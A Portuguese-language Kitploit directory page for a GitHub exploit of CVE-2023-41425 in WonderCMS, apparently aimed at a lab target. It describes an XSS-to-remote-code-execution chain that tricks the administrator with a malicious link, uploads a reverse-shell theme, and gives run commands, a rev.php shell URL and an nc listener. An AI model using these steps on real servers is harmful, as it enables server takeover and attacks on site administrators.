Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — Injeção XSS, WonderCMS 3.2.0 -3.4.2 | Kitploit
Ferramentas/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
Ferramentas de PhishingGeração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-41425-WonderCMS-Authenticated-RCE

Injeção XSS, WonderCMS 3.2.0 -3.4.2

Ver Repositório
13há 1 anoAinda não revisado

CVE-2023-41425-WonderCMS-Authenticated-RCE

Descrição

WonderCMS v3.2.0 - v3.4.2 é vulnerável. Atacantes remotos podem assumir o controle total do servidor usando um exploit de Cross-Site Scripting (XSS) (Apenas para fins educacionais). Aqui está o plano:

Como funciona:

O exploit abusa do componente installModule do WonderCMS para inserir um script malicioso que executa código arbitrário.

Configuração

  • Ferramenta: exploit.py
  • O que você precisa:
    • URL alvo onde o WonderCMS está instalado (nenhuma senha de administrador necessária).
    • IP da sua máquina atacante.
    • Uma porta para o seu listener de reverse shell.

Execução Passo a Passo

  1. O script gera um arquivo chamado xss.js. Esta arma JavaScript é projetada para explorar XSS refletido.
  2. Ele gera um link malicioso. Você enviará isso ao administrador.
  3. A mágica acontece quando o administrador (um usuário logado) abre ou clica no seu link:
  • Requisições em segundo plano são disparadas sem o consentimento dele.
  • Um payload de reverse shell é carregado usando o recurso de upload de tema/plugin.
  1. Uma vez carregado, o payload é executado e concede a você uma conexão reverse shell diretamente ao servidor alvo.
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

Exemplo

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

Falha Segura:

Se a reverse shell não disparar automaticamente, vá para:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

nota:

Lembre-se de iniciar um listener usando o seguinte comando:

root@kitploit:~
nc -lvp 4444

Créditos

prodigiousMind por descobrir e relatar a vulnerabilidade https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

Baixar ferramenta